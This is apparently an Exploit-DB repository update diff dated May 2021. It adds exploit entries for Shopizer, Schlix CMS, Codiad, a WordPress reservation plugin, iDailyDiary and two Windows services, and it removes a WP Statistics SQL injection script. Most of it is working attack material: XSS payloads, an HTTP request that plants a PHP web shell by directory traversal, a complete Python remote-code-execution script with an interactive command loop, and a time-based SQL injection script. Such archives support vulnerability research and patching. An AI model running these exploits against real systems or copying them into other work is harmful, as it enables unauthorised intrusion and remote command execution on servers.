DB: 2021-05-25

9 changes to exploits/shellcodes

iDailyDiary 4.30 - Denial of Service (PoC)
DiskBoss Service 12.2.18 - 'diskbsa.exe' Unquoted Service Path
ePowerSvc 6.0.3008.0 - 'ePowerSvc.exe' Unquoted Service Path

WordPress Plugin WP Statistics 13.0.7 - Time-Based Blind SQL Injection (Unauthenticated)
Schlix CMS 2.2.6-6 - Arbitary File Upload And Directory Traversal Leads To RCE (Authenticated)
Shopizer 2.16.0 - 'Multiple' Cross-Site Scripting (XSS)
Codiad 2.8.4 - Remote Code Execution (Authenticated) (2)
WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)

exploits/java/webapps/49901.txt

@@ -0,0 +1,30 @@
+# Exploit Title: Shopizer 2.16.0 - 'Multiple' Cross-Site Scripting (XSS)
+# Date: 23-05-2021
+# Exploit Author: Marek Toth 
+# Vendor Homepage: https://www.shopizer.com
+# Software Link: https://github.com/shopizer-ecommerce/shopizer
+# Version: <= 2.16.0
+
+Stored XSS - 'customer_name' Administration 
+
+Description:
+A stored cross-site scripting (XSS) vulnerability in Shopizer before version 2.17.0 allows remote attackers to inject arbitrary web script or HTML via customer_name in various forms of store administration and saved in the database. The code is executed for any user of store administration when information is fetched from backend.
+
+Steps to reproduce:
+1. Open "http://example.com/admin/" and login to the administration
+2. Open "Customers" (http://example.com/admin/customers/list.html) and click on the "Details" button
+3. Change customer name to <script>alert(1)</script> and save it
+4. Open "Customers" -> XSS payload will trigger
+
+
+Reflected XSS - 'ref' parameter 
+
+Description:
+A reflected cross-site scripting (XSS) vulnerability in Shopizer before version 2.17.0 allows remote attackers to inject arbitrary web script or HTML via the 'ref' parameter.
+
+Payloads: 
+'+alert(1)+'
+'+eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))+'
+
+PoC:
+http://example.com/shop/product/vintage-bag-with-leather-bands.html/ref='+alert(1)+'

exploits/multiple/webapps/49897.txt

@@ -0,0 +1,79 @@
+# Exploit Title: Schlix CMS 2.2.6-6 - Arbitary File Upload And Directory Traversal Leads To RCE (Authenticated)
+# Date: 21.05.2021
+# Exploit Author: Emir Polat
+# Vendor Homepage: https://www.schlix.com/
+# Software Link: https://www.schlix.com/html/schlix-cms-downloads.html
+# Version: 2.2.6-6
+# Tested On: Ubuntu 20.04 (Firefox)
+
+############################################################################################################
+
+Summary: An authorized user can upload a file with a .phar extension
+to a path of his choice and control the content as he wishes. This causes RCE vulnerability.
+
+For full technical details and source code analysis:
+https://anatolias.medium.com/schlix-cms-v2-2-6-6-c17c5b2f29e.
+
+############################################################################################################
+
+PoC:
+
+1-) Login to admin panel with true credentials and go to "Tools ->
+Mediamanager" menu from left side.
+
+2-)  Click the "Upload File" and upload a file and catch the request with Burp.
+
+3-) Change the "uploadstartpath", "filename" and file content as follows.
+
+# Request
+
+POST /schlix/admin/app/core.mediamanager?&ajax=1&action=upload HTTP/1.1
+Host: vulnerable-server
+Content-Length: 846
+X-Schlix-Ajax: 1
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+Content-Type: multipart/form-data;
+boundary=----WebKitFormBoundarybllOFLruz1WAs7K2
+Accept: */*
+Origin: http:// <http://10.211.55.4/>vulnerable-server
+Referer: http://vulnerable-server/schlix/admin/app/core.mediamanager
+<http://10.211.55.4/schlix/admin/app/core.mediamanager>
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: core-mediamanager_currentCategory=%2Fmedia%2Fpdf;
+schlix-your-cookie;__atuvc=5%7C20;
+schlix_frontendedit_control_showblock=-2;
+schlix_frontendedit_control_showhide=-2;
+schlix_frontendedit_control_showdoc=-2
+Connection: close
+
+------WebKitFormBoundarybllOFLruz1WAs7K2
+Content-Disposition: form-data; name="_csrftoken"
+
+{your_csrf_token}
+------WebKitFormBoundarybllOFLruz1WAs7K2
+Content-Disposition: form-data; name="uploadstartpath"
+
+/media/docs/....//....//....//....//system/images/avatars/large/
+------WebKitFormBoundarybllOFLruz1WAs7K2
+Content-Disposition: form-data; name="filedata[]"; filename="shell.phar"
+
+<?PHP system($_GET['rce']);?>
+
+------WebKitFormBoundarybllOFLruz1WAs7K2
+Content-Disposition: form-data; name="MAX_FILE_SIZE"
+
+2097152
+------WebKitFormBoundarybllOFLruz1WAs7K2
+Content-Disposition: form-data; name="filedata__total_file_size"
+
+0
+------WebKitFormBoundarybllOFLruz1WAs7K2
+Content-Disposition: form-data; name="filedata__max_file_count"
+
+20
+------WebKitFormBoundarybllOFLruz1WAs7K2--
+
+
+4-) Go to "vulnerable-server/schlix/system/images/avatars/large/shell.phar?rce=ls".

exploits/multiple/webapps/49902.py

@@ -0,0 +1,130 @@
+# Exploit Title: Codiad 2.8.4 - Remote Code Execution (Authenticated) (2)
+# Date: 21.05.2021
+# Exploit Author: Ron Jost (Hacker5preme)
+# Credits to: https://herolab.usd.de/security-advisories/usd-2019-0049/ (Tobias Neitzel)
+# Vendor Homepage: http://codiad.com/
+# Software Link: https://github.com/Codiad/Codiad/releases/tag/v.2.8.4
+# Version: 2.8.4
+# Tested on: Xubuntu 20.04 and Cent OS 8.3
+# CVE: CVE-2019-19208
+
+'''
+Description: 
+An unauthenticated attacker can inject PHP code before the initial configuration
+that gets executed and therefore he can run arbitrary system commands on the server.
+'''
+
+
+'''
+Import required modules:
+'''
+import requests
+import json
+import sys
+import time
+
+
+'''
+User-Input:
+'''
+target_ip = sys.argv[1]
+target_port = sys.argv[2]
+
+
+'''
+Determining target:
+--> The installationpaths to select from are derived from the installation instructions from:
+        https://github.com/Codiad/Codiad/wiki/Installation
+'''
+print('Enter one of the following numbers to proceed')
+print('[1]: OS of the target: Higher than Ubuntu 13.04; path: /var/www/html/')
+print('[2]: OS of the target: Ubuntu 13.04 or below; path: /var/www/')
+print('[3]: OS of the target: CENT OS; path: /var/www/html/')
+selection = int(input('Your Choice: '))
+if selection == 3 or selection == 1:
+    path = "/var/www/html"
+    content_len = "191"
+if selection == 2:
+    path = '/var/www'
+    content_len = '185'
+
+
+'''
+Get cookie
+'''
+session = requests.Session()
+link = 'http://' + target_ip + ':' + target_port + '/'
+response = session.get(link)
+cookies_session = session.cookies.get_dict()
+cookie = json.dumps(cookies_session)
+cookie = cookie.replace('"}','')
+cookie = cookie.replace('{"', '')
+cookie = cookie.replace('"', '')
+cookie = cookie.replace(" ", '')
+cookie = cookie.replace(":", '=')
+
+
+'''
+Construct header:
+'''
+header = {
+    'Host': target_ip,
+    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.',
+    'Accept': '*/*',
+    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
+    'Accept-Encoding': 'gzip, deflate',
+    'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
+    'X-Requested-With': 'XMLHttpRequest',
+    'Content-Length': content_len,
+    'Origin': 'htttp://' + target_ip,
+    'Connection': 'close',
+    'Referer': 'http://' + target_ip + '/',
+    'Cookie': cookie,
+}
+
+
+'''
+Construct body:
+'''
+string = """'"); system($_GET["cmd"]); print("'"""
+body = {
+    'path': path,
+    'username': 'test',
+    'password': 'exploit',
+    'password_confirm': 'exploit',
+    'project_name': 'hello',
+    'project_path': path + '/data',
+    'timezone': str(string)
+}
+
+
+'''
+Post the request with the malaicious payload
+'''
+print('Posting request with malicious payload')
+link = link + '/components/install/process.php'
+x = requests.post(link, headers=header, data=body)
+print('Waiting 10 seconds')
+time.sleep(10)
+
+
+'''
+Create payload / persistend command execution:
+'''
+header = {
+    'Host': target_ip,
+    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0',
+    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
+    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
+    'Accept-Encoding': 'gzip, deflate',
+    'Connection': 'close',
+    'Cookie': cookie,
+    'Upgrade-Insecure-Requests': '1',
+    'Cache-Control': 'mag-age=0'
+}
+payload = input('Input the command, which should be executed on the targeted machine. To abort enter EXIT: ')
+while payload != 'EXIT':
+    link_payload = 'http://' + target_ip + ':' + target_port + '/config.php?cmd=' + payload
+    x = requests.get(link_payload, headers=header)
+    print(x.text)
+    payload = input('Input the command, which should be executed on the targeted machine. To abort enter EXIT: ')

exploits/php/webapps/49894.sh

@@ -1,130 +0,0 @@
-# Exploit Title: WordPress Plugin WP Statistics 13.0.7 - Time-Based Blind SQL Injection (Unauthenticated)
-# Date: 20/05/2021
-# Exploit Author: Mansoor R (@time4ster)
-# CVSS Score: 7.5 (High)
-# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
-# Version Affected: 13.0 to 13.0.7
-# Vendor URL: https://wordpress.org/plugins/wp-statistics/
-# Patch: Upgrade to wp-statistics 13.0.8 (or above)
-# Tested On: wp-statistics 13.0.6,13.0.7
-
-#!/bin/bash
-
-# Credits: 
-# https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/
-
-# SQLmap Exploit for grepping database banner (automated):
-# sqlmap -u "http://192.168.1.54/wordpress/wp-admin/admin.php?ID=1&page=wps_pages_page&type=1" --techniqu=T --dbms="mysql" -p "ID" -b
-
-# WARNINGS: 
-# Only test the exploit on websites you are authorized to.
-# The exploit will perform sleep for 3 seconds. Don't use on production server of organization without prior permissions.
-
-
-# Exploit
-# ==============
-
-echo
-echo "============================================================================================"
-echo "Unauthenticated Time-Based Blind SQL Injection in WP Statistics < 13.0.8"
-echo
-echo "By: Mansoor R (@time4ster)"
-echo "============================================================================================"
-echo
-
-
-
-function printHelp()
-{
-	echo -e "
-Usage:
-
--u|--wp-url      <string>		Wordpress target url
--k|--check				Only checks whether vulnerable version of plugin is running or not.
--h|--help				Print Help menu
-
-
-Example:
-./wp-statistics-exploit.sh --wp_url https://www.example.com/wordpress 
-./wp-statistics-exploit.sh --wp_url https://www.example.com/wordpress --check
-"
-}
-
-#Processing arguments
-check="false"
-exploit="true"
-while [[ "$#" -gt 0 ]]
-do
-key="$1"
-
-case "$key" in
-    -u|--wp-url)
-	    wp_url="$2"
-	    shift
-	    shift # past argument
-	    ;;
-    -k|--check)
-	    check="true"
-	    exploit="false"
-	    shift
-	    shift
-	    ;;
-    -h|--help)
-	    printHelp
-	    exit
-	    shift
-	    ;;
-    *)   
-	    echo [-] Enter valid options
-	    exit
-	    ;;
-esac
-done
-
-[[ -z "$wp_url" ]] && echo "[-] Supply wordpress target URL. Use -h for help menu." && exit
-
-function checkVersion()
-{
-	url="$1"
-	[[ -z "$url" ]] && return
-	target_endpoint="$url/wp-content/plugins/wp-statistics/readme.txt"
-	user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36"
-
-	version=$(curl -ks --max-time 5 --user-agent "$user_agent" "$target_endpoint" | grep -i -m 1 "stable tag:" | grep -o -E "[0-9]+\.[0-9]+\.[0-9]+")
-	[[ -n "$version" ]] && echo "[+] WP-statistical Plugin Version: $version" 
-	[[ -z "$version" ]] && echo "[-] WP-statistical Unable to detect version." && return
-
-	vuln_version=(13.0.7 13.0.6 13.0.5 13.0.4 13.0.3 13.0.1 13.0)
-	is_vulnerable="false"
-	for v in "${vuln_version[@]}";do 
-		[[ "$version" == "$v" ]] && is_vulnerable="true" && break	
-	done
-	[[ "$is_vulnerable" == "true" ]] && echo "[++] Target $url is Vulnerable"
-	[[ "$is_vulnerable" == "false" ]] && echo "[--] Target $url is  Not Vulnerable"
-}
-
-function exploitPlugin()
-{
-	url="$1"
-	target_endpoint="$url/wp-admin/admin.php"
-	user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36"
-	sleep=3
-	payload="ID=1 AND (SELECT * from (select SLEEP($sleep))a)"
-	
-	echo -e -n "[!] Caution: You are going to execute sleep database command for $sleep seconds. Proceed only if you have permission.\nPress (Y/y) to continue or any other key to exit: "
-	read choice
-	[[ "$choice" != "y" ]] && [[ "$choice" != "Y" ]] && return
-
-	echo
-	echo "[+] Trying Payload:"	
-	set -x
-	curl -v -ks -G --user-agent "$user_agent" "$target_endpoint" \
-		--data-urlencode "page=wps_pages_page" \
-		--data-urlencode "type=1" \
-		--data-urlencode "$payload"
-	
-
-}
-
-[[ "$check" == "true" ]] && checkVersion "$wp_url"
-[[ "$exploit" == "true" ]] && exploitPlugin "$wp_url"

exploits/php/webapps/49903.txt

@@ -0,0 +1,19 @@
+# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)
+# Date: 2021-05-10
+# Exploit Author: Bastijn Ouwendijk
+# Vendor Homepage: https://reservationdiary.eu/
+# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/
+# Version: 21.0307 and earlier
+# Tested on: Windows 10
+# CVE : CVE-2021-24299
+# Proof: https://bastijnouwendijk.com/cve-2021-24299/
+
+Steps to exploit this vulnerability:
+
+1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information
+2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert("XSS")</script>`
+3. Submit the form
+4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)
+5. Click on 'View upcoming reservations'
+6. Select for 'Show reservations for': 'This week'
+7. The reservations are loaded and two alerts are shown with text 'XSS'

exploits/windows/dos/49898.txt

@@ -0,0 +1,30 @@
+# Exploit Title: iDailyDiary 4.30 - Denial of Service (PoC)
+# Date: 2021-05-21
+# Exploit Author: Ismael Nava
+# Vendor Homepage: https://www.splinterware.com/index.html
+# Software Link: https://www.splinterware.com/download/iddfree.exe
+# Version: 4.30
+# Tested on: Windows 10 Home x64
+
+#STEPS
+# Open the program iDailyDiary
+# Create a New Diary, put any name and check the option "Do not prompt for password", click in OK
+# In the tab "View", click in "Preferences"
+# Click in the option "Tabs"
+# Run the python exploit script, it will create a new .txt files
+# Copy the content of the file "Sotsu.txt"
+# Paste the content in the field below "Default diary tab name when creating new tabs" 
+# Click in Apply
+# End :)
+
+
+buffer = 'F' * 2000000
+
+try: 
+    file = open("Sotsu.txt","w")
+    file.write(buffer)
+    file.close()
+
+    print("Archive ready")
+except:
+    print("Archive no ready")

exploits/windows/local/49899.txt

@@ -0,0 +1,32 @@
+# Exploit Title: DiskBoss Service 12.2.18 - 'diskbsa.exe' Unquoted Service Path
+# Discovery by: Erick Galindo 
+# Discovery Date: 2021-05-21
+# Vendor Homepage: https://www.diskboss.com
+# Software :  https://www.diskboss.com/setups_x64/diskboss_setup_v12.2.18_x64.exe
+# Tested Version: 12.2.18
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Pro  x64 es
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "DiskBoss" | findstr /i /v """
+DiskBoss Service                 DiskBoss Service            C:\Program Files\DiskBoss\bin\diskbsa.exe                   Auto
+
+# Service info
+
+C:\>sc qc "DiskBoss Service"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: DiskBoss Service
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 0   IGNORE
+        NOMBRE_RUTA_BINARIO: C:\Program Files\DiskBoss\bin\diskbsa.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : DiskBoss Service
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
+
+#Exploit:
+
+This vulnerability could permit executing code during startup or reboot with the escalated privileges.

exploits/windows/local/49900.txt

@@ -0,0 +1,38 @@
+# Exploit Title: ePowerSvc 6.0.3008.0 - 'ePowerSvc.exe'  Unquoted Service Path
+# Discovery by: Emmanuel Lujan
+# Discovery Date: 2021-05-22
+# Vendor Homepage: https://www.acer.com
+# Tested Version: 6.0.3008.0
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 7 Home Premium x64 
+
+# Step to discover Unquoted Service Path: 
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
+
+ePower Service                                                          ePowerSv
+c                                     C:\Program Files\Acer\Acer ePower Manageme
+nt\ePowerSvc.exe                                          Auto
+
+# Service info:
+
+C:\>sc qc "ePowerSvc"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: ePowerSvc
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\Acer\Acer ePower Management\ePower
+Svc.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : ePower Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other
+ security applications where it could potentially be executed during application startup or reboot. If successful, the local user's 
+code would execute with the elevated privileges of the application.

files_exploits.csv

@@ -6782,6 +6782,7 @@ id,file,description,date,author,type,platform,port
 49807,exploits/php/dos/49807.py,"WordPress Plugin WPGraphQL 1.3.5 - Denial of Service",2021-04-27,"Dolev Farhi",dos,php,
 49844,exploits/windows/dos/49844.py,"Sandboxie 5.49.7 - Denial of Service (PoC)",2021-05-07,"Erick Galindo",dos,windows,
 49883,exploits/ios/dos/49883.py,"WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC)",2021-05-19,"Luis Martínez",dos,ios,
+49898,exploits/windows/dos/49898.txt,"iDailyDiary 4.30 - Denial of Service (PoC)",2021-05-24,"Ismael Nava",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -11335,6 +11336,8 @@ id,file,description,date,author,type,platform,port
 49890,exploits/windows/local/49890.txt,"Acer Updater Service 1.2.3500.0 - 'UpdaterService.exe'  Unquoted Service Path",2021-05-20,"Emmanuel Lujan",local,windows,
 49892,exploits/windows/local/49892.py,"Mozilla Firefox 88.0.1 - File Extension Execution of Arbitrary Code",2021-05-21,"BestEffort Team",local,windows,
 49893,exploits/windows/local/49893.c++,"DELL dbutil_2_3.sys 2.3 - Arbitrary Write to Local Privilege Escalation (LPE)",2021-05-21,"Paolo Stagno",local,windows,
+49899,exploits/windows/local/49899.txt,"DiskBoss Service 12.2.18 - 'diskbsa.exe' Unquoted Service Path",2021-05-24,"Erick Galindo",local,windows,
+49900,exploits/windows/local/49900.txt,"ePowerSvc 6.0.3008.0 - 'ePowerSvc.exe' Unquoted Service Path",2021-05-24,"Emmanuel Lujan",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -44059,5 +44062,8 @@ id,file,description,date,author,type,platform,port
 49886,exploits/php/webapps/49886.txt,"COVID19 Testing Management System 1.0 - SQL Injection (Auth Bypass)",2021-05-19,"Rohit Burke",webapps,php,
 49887,exploits/php/webapps/49887.txt,"COVID19 Testing Management System 1.0 - 'Admin name' Cross-Site Scripting (XSS)",2021-05-19,"Rohit Burke",webapps,php,
 49891,exploits/multiple/webapps/49891.txt,"Spotweb 1.4.9 - DOM Based Cross-Site Scripting (XSS)",2021-05-21,nu11secur1ty,webapps,multiple,
-49894,exploits/php/webapps/49894.sh,"WordPress Plugin WP Statistics 13.0.7 - Time-Based Blind SQL Injection (Unauthenticated)",2021-05-21,"Mansoor R",webapps,php,
 49895,exploits/windows/webapps/49895.rb,"Microsoft Exchange 2019 - Unauthenticated Email Download (Metasploit)",2021-05-21,mekhalleh,webapps,windows,
+49897,exploits/multiple/webapps/49897.txt,"Schlix CMS 2.2.6-6 - Arbitary File Upload And Directory Traversal Leads To RCE (Authenticated)",2021-05-24,"Emir Polat",webapps,multiple,
+49901,exploits/java/webapps/49901.txt,"Shopizer 2.16.0 - 'Multiple' Cross-Site Scripting (XSS)",2021-05-24,"Marek Toth",webapps,java,
+49902,exploits/multiple/webapps/49902.py,"Codiad 2.8.4 - Remote Code Execution (Authenticated) (2)",2021-05-24,"Ron Jost",webapps,multiple,
+49903,exploits/php/webapps/49903.txt,"WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)",2021-05-24,"Bastijn Ouwendijk",webapps,php,